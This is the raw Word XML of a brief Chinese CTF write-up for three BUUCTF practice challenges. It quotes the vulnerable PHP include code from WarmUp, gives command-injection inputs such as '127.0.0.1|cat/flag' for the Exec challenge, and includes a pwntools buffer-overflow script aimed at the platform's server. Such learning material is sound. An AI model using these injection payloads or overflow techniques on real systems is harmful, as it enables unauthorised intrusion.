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3483B" w14:textId="29457364" w:rsidR="00AC2535" w:rsidRDefault="004E38F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E38F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>BUU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695EA347" w14:textId="65C44CBC" w:rsidR="00166A98" w:rsidRPr="00797BCD" w:rsidRDefault="00797BCD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:anchor="[HCTF%202018]WarmUp" w:history="1">
        <w:r w:rsidRPr="00797BCD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="44"/>
            <w:szCs w:val="44"/>
          </w:rPr>
          <w:t>BUUCTF在线评测</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2155AEA0" w14:textId="77777777" w:rsidR="00166A98" w:rsidRDefault="00166A98">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00166A98">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38666AB2" wp14:editId="2656E538">
            <wp:extent cx="5274310" cy="2683510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="115271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12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23CA" w14:textId="09FF4D17" w:rsidR="00166A98" w:rsidRPr="00166A98" w:rsidRDefault="00166A98">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00166A98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>提示查看PHP文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10624C4C" w14:textId="5573832E" w:rsidR="00166A98" w:rsidRDefault="00166A98">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00166A98">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F77D322" wp14:editId="779E5346">
            <wp:extent cx="5274310" cy="3235325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1462423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23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BF5B" w14:textId="50ECD115" w:rsidR="00166A98" w:rsidRDefault="00166A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所以查看hint.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B49BE77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>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671CAAE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highlight_file(__FILE__);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D456CC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class emmm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A12C0E0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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7E396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public static function checkFile(&amp;$page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BF636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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D14365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$whitelist = ["source"=&gt;"source.php","hint"=&gt;"hint.php"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18134200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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            //如果page的值为空或者不是字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D7B857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if (! isset($page) || !is_string($page)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC7C03E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echo "you can't see it";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D26CDD0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return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B25C62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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F01CD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  <w:t>//检测page的值是否在白名单中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E450C6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if (in_array($page, $whitelist)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F8EFA2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return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0DE036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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155F409A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  <w:t>//返回page中从第0位开始到第一个？出现的位置，之间的值赋给page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023E0447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$_page = mb_substr(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2036D157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$page,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7209BD43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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAEAF3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mb_strpos($page . '?', '?')//查找字符串在另一个字符串中首次出现的位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A83F4BF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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5351064C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//检验page的值是否在白名单内</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B7350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if (in_array($_page, $whitelist)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4333BEDF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return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E3FB0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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104E1224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</w:r>
      <w:r w:rsidRPr="00734B7D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>//将url编码后的字符串还原成未编码的样子，然后赋值给page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1AA255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$_page = urldecode($page);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED253A4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//返回page中从第0位开始到第一个？出现的位置，之间的值赋给page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DFC6B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$_page = mb_substr(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D667EA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$_page,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405D6043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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5942C587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mb_strpos($_page . '?', '?')//查找字符串在另一个字符串中首次出现的位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A0A80D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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5BFD06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//检验page的值是否在白名单内</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5306A439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if (in_array($_page, $whitelist)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D6FEC4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    return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F879CD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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616563B8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echo "you can't see it";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AF772B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    return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7B609F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37368FD9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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43395ABD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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5AD583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if (! empty($_REQUEST['file'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BDB5B1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&amp;&amp; is_string($_REQUEST['file'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF01C7E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&amp;&amp; emmm::checkFile($_REQUEST['file'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F81FBC4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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A480EC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include $_REQUEST['file'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F294BB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exit;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A40B035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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB4DF35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t xml:space="preserve">        echo "&lt;br&gt;&lt;img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" /&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE3DB0F" w14:textId="77777777" w:rsidR="00734B7D" w:rsidRPr="00734B7D" w:rsidRDefault="00734B7D" w:rsidP="00734B7D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00734B7D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B85B328" w14:textId="11C47BB8" w:rsidR="00734B7D" w:rsidRDefault="00734B7D" w:rsidP="00734B7D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00734B7D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
      <w:r w:rsidR="000E6AC8" w:rsidRPr="000E6AC8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E6AC8" w:rsidRPr="000E6AC8">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F9DFFB" wp14:editId="348F6BD8">
            <wp:extent cx="5274310" cy="2976880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1920222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2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8EF1" w14:textId="4CB2EA86" w:rsidR="00AD454C" w:rsidRPr="00AD454C" w:rsidRDefault="00AD454C" w:rsidP="00734B7D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:anchor="[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Exec" w:history="1">
        <w:r w:rsidRPr="00AD454C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:sz w:val="44"/>
            <w:szCs w:val="44"/>
          </w:rPr>
          <w:t>BUUCTF在线评测</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D75CE1D" w14:textId="0082C426" w:rsidR="00AD454C" w:rsidRDefault="00AD454C" w:rsidP="00734B7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>输入127.0.0.1|ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C212A82" w14:textId="234AF5E6" w:rsidR="00AD454C" w:rsidRDefault="00AD454C" w:rsidP="00734B7D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD454C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DC83B52" wp14:editId="46EFE953">
            <wp:extent cx="5274310" cy="2788920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="774572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2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01B6" w14:textId="655E2568" w:rsidR="00AD454C" w:rsidRDefault="00AD454C" w:rsidP="00734B7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输入127.0.0.1|cat/flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631783F0" w14:textId="1018DDF1" w:rsidR="00AD454C" w:rsidRDefault="00AD454C" w:rsidP="00734B7D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD454C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="250728F0" wp14:editId="1B4F13D1">
            <wp:extent cx="5274310" cy="2487295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="10109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1A72" w14:textId="6FACB51D" w:rsidR="00A46124" w:rsidRDefault="00A46124" w:rsidP="00734B7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PWN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344D1348" w14:textId="1AA4B892" w:rsidR="00C47957" w:rsidRDefault="00C47957" w:rsidP="00734B7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通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ets溢出到40060D就足够了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C022583" w14:textId="2D0F6093" w:rsidR="00C47957" w:rsidRDefault="00C47957" w:rsidP="00734B7D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然后是写脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB0DF3" w14:textId="6F59C582" w:rsidR="00C47957" w:rsidRDefault="00C47957" w:rsidP="00734B7D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C47957">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61FB07EE" wp14:editId="3BE13BC1">
            <wp:extent cx="5274310" cy="2359025"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="930683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3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DFB7" w14:textId="43A63199" w:rsidR="00C47957" w:rsidRDefault="00C47957" w:rsidP="00734B7D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C47957">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59C98CB4" wp14:editId="323CC1A0">
            <wp:extent cx="5274310" cy="1950720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="822773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3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E800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from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDB39F6" w14:textId="77777777" w:rsidR="00C47957" w:rsidRPr="00C47957" w:rsidRDefault="00C47957" w:rsidP="00C47957">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="014B9D37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r = remote('node3.buuoj.cn',29469)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDAEA6C" w14:textId="77777777" w:rsidR="00C47957" w:rsidRPr="00C47957" w:rsidRDefault="00C47957" w:rsidP="00C47957">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056007DB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offset = 0x40+8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501A1A99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payload = offset*'a' + p64(0x000400611)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147B48B6" w14:textId="77777777" w:rsidR="00C47957" w:rsidRPr="00C47957" w:rsidRDefault="00C47957" w:rsidP="00C47957">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A11B86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r.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A9C05E" w14:textId="77777777" w:rsidR="00C47957" w:rsidRPr="00C47957" w:rsidRDefault="00C47957" w:rsidP="00C47957">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C47957">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>r.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB9001E" w14:textId="77777777" w:rsidR="00C47957" w:rsidRDefault="00C47957" w:rsidP="00734B7D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B44325" w14:textId="5C36FF1A" w:rsidR="00C47957" w:rsidRPr="00C47957" w:rsidRDefault="00C47957" w:rsidP="00734B7D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最后结束</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C47957" w:rsidRPr="00C479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74"/>
    <w:rsid w:val="000E6AC8"/>
    <w:rsid w:val="00157676"/>
    <w:rsid w:val="00166A98"/>
    <w:rsid w:val="00465374"/>
    <w:rsid w:val="004E38F7"/>
    <w:rsid w:val="00502135"/>
    <w:rsid w:val="00734B7D"/>
    <w:rsid w:val="007651E8"/>
    <w:rsid w:val="00797BCD"/>
    <w:rsid w:val="00966887"/>
    <w:rsid w:val="00A46124"/>
    <w:rsid w:val="00AC2535"/>
    <w:rsid w:val="00AD454C"/>
    <w:rsid w:val="00BB2F03"/>
    <w:rsid w:val="00C47957"/>
    <w:rsid w:val="00E4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5349"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B9EA2AE3-6DF0-4066-AD7F-8A38C3B6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54C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D45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uoj.cn/challenges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buuoj.cn/challenges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昱淇 焦</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>昱淇 焦</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-26T07:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-26T08:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>